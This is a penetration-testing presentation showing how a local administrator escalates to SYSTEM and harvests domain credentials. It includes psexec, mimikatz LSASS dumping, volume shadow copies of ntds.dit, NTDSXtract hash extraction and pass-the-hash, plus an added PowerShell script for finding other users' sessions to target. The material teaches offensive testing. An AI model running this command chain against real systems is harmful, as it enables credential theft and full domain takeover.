![Page 1: Fall of a domain | From local admin to Domain user hashes](https://reader035.vdocuments.us/reader035/viewer/2022062702/55495b5cb4c90566498b5544/html5/thumbnails/1.jpg)
LOCAL ADMIN TO DOMAIN USER HASHES
The Fall of a Domain
Riyaz Walikar
Disclaimer
It was far more painstaking and complicated than this!
The demo setup shown here only illustrates the execution path
All the commands were actually used in the pentest
Please do not try this on your office/corporate environment without written permission
Please exercise caution!
The story so far
Remote RDP access to a machine on the client network via VPN
Local Administrator rights on that machine, to simulate an employee's workstation
The account itself is a limited (non-privileged) domain user
Domain controller on the same network, reachable with LDAP services running
Visually. This.
Local Admin eh?
Locally logged in as TARDIS\fwhite
Limited domain user, but local admin on this box
Other users connected? [Task Manager > Users]
Found another user connected to our system via RDP - sweet! (possibly a domain admin)
Need SYSTEM privileges to read their credentials out of LSASS. Any ideas?
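Before spending effort on the escalation, it is worth confirming that the other session really belongs to a different account and that it came in over RDP. The following is an added example, not from the original slides: a PowerShell parser for the output of the built-in quser.exe that returns every interactive session except the caller's own. The sample quser output is constructed so the parser can be exercised offline; the function name is an assumption.

```powershell
# Added example (not from the slides). Parses quser.exe output into objects and
# returns sessions owned by someone other than $Me. quser columns are not fixed
# width, so the parser splits on runs of two or more spaces; a disconnected
# session has an empty SESSIONNAME column, which leaves 5 fields instead of 6.
function Get-OtherUserSessions {
    param(
        # Defaults to live quser output; pass captured lines to run offline
        [string[]]$QuserOutput = (& quser.exe 2>$null),
        [string]$Me = $env:USERNAME
    )
    $result = @()
    foreach ($line in ($QuserOutput | Select-Object -Skip 1)) {   # skip header row
        if ([string]::IsNullOrWhiteSpace($line)) { continue }
        # the caller's own session is prefixed with '>'
        $fields = $line.TrimStart('>').Trim() -split '\s{2,}'
        if ($fields.Count -eq 5) {          # USERNAME ID STATE IDLE LOGON (disconnected)
            $user, $id, $state, $idle, $logon = $fields
            $sess = ''
        } elseif ($fields.Count -eq 6) {    # USERNAME SESSIONNAME ID STATE IDLE LOGON
            $user, $sess, $id, $state, $idle, $logon = $fields
        } else {
            continue                        # unexpected line, ignore
        }
        if ($user -ieq $Me) { continue }
        $result += [pscustomobject]@{
            User      = $user
            Session   = $sess
            Id        = [int]$id
            State     = $state
            Idle      = $idle
            LogonTime = $logon
            IsRdp     = ($sess -like 'rdp-tcp*')   # came in over Remote Desktop
        }
    }
    return $result
}

# Constructed sample output (not from the engagement) so the parser runs offline
$sample = @'
 USERNAME              SESSIONNAME        ID  STATE   IDLE TIME  LOGON TIME
>fwhite                rdp-tcp#0           2  Active          .  6/13/2013 9:15 AM
 atomboy               rdp-tcp#1           3  Active         12  6/13/2013 8:50 AM
 svc_backup                                4  Disc         1:05  6/12/2013 11:02 PM
'@ -split "`r?`n"

# Two sessions come back: atomboy (active, RDP) and svc_backup (disconnected, no session name)
Get-OtherUserSessions -QuserOutput $sample -Me 'fwhite' | Format-Table -AutoSize
```

Run `Get-OtherUserSessions` with no arguments on the target to use live quser output. A disconnected session still matters: its credentials remain in LSASS until the user logs off, so it is just as good a target for the next step as an active one.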
Think Sysinternals!
psexec -s -i cmd.exe (spawns cmd.exe as NT AUTHORITY\SYSTEM on the local box: -s = run as SYSTEM, -i = interactive on the current desktop)
Dump connected user credentials
mimikatz (Benjamin Delpy)
Extracts the plaintext passwords of logged-on users from LSASS memory
Providers: wdigest, tspkg, kerberos and many more
mimikatz privilege::debug token::elevate sekurlsa::logonPasswords
privilege::debug needs SeDebugPrivilege (which the SYSTEM shell from the previous step has); on current Windows builds WDigest no longer caches plaintext by default (KB2871997 / UseLogonCredential), so expect NTLM hashes rather than passwords there
Windows (In)Security?
Now what?
http://gapingvoid.com/2008/06/13/now-what/
Remote CMD anyone?
RDP directly with the stolen credentials?
Let's be discreet
psexec -s -u TARDIS\atomboy \\10.10.10.1 cmd.exe (no -p, so psexec prompts for the password instead of leaving it in the command line)
Game already over!
Instead, RDP to the DC with the user's credentials and present the report
Let's grab some hashes
Active Directory stores user information, including password hashes, in %systemroot%\ntds\ntds.dit
The file is held open by the directory service while the DC is running, so it cannot be copied directly
ntdsutil + snapshot = backup (Windows Server 2008 and later)
vssadmin create shadow /for=C: (Windows Server 2003 and later)
Let's grab some hashes
The shadow copy is readable by NT AUTHORITY\SYSTEM and Administrators
We need the ntds.dit and SYSTEM (registry hive) files; the SYSTEM hive holds the boot key needed to decrypt the hashes in ntds.dit
cd, dir and other cmd built-ins cannot browse an unmounted volume shadow copy (exposed as \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyN\...)
copy works!
Core files needed
NTDS.dit structure parse?
NTDSXtract - a framework for offline forensic analysis of ntds.dit
Needs libesedb (the ESE database library) as well, to export the tables out of the .dit first
libesedb and creddump are bundled in ntds_dump_hash.zip
Download everything to a Linux box (Kali is a good choice)
get framework + compile + make + run
wget http://ntdsxtract.com/downloads/ntdsxtract/ntdsxtract_v1_0.zip
wget http://ntdsxtract.com/downloads/ntds_dump_hash.zip
unzip both
get framework + compile + make + run
cd ntds_dump_hash/libesedb
./configure && make
cd esedbtools
./esedbexport -l /tmp/ntds.log <ntds.dit>
The tables land in <ntds.dit>.export/ as datatable.N and link_table.N (N is a table number assigned by esedbexport)
Yay!
python ../../ntdsxtract/dsusers.py <datatable> <link_table> --passwordhashes <system_file> --passwordhistory <system_file>
<datatable> and <link_table> are the exported datatable.N and link_table.N files; <system_file> is the SYSTEM hive copied from the DC
Clean up the output into pwdump format with ntdstopwdump.py (https://raw.github.com/inquisb/miscellaneous/master/ntdstopwdump.py)
Now what?
http://gapingvoid.com/2008/06/13/now-what/
Pass the hash / password cracking!
Pass the hash with the Windows Credentials Editor (WCE) from Amplia Security
Password cracking >> Humla, perhaps
References
http://blog.gentilkiwi.com/mimikatz
http://www.ampliasecurity.com/research/wcefaq.html
http://bernardodamele.blogspot.in/2011/12/dump-windows-password-hashes_16.html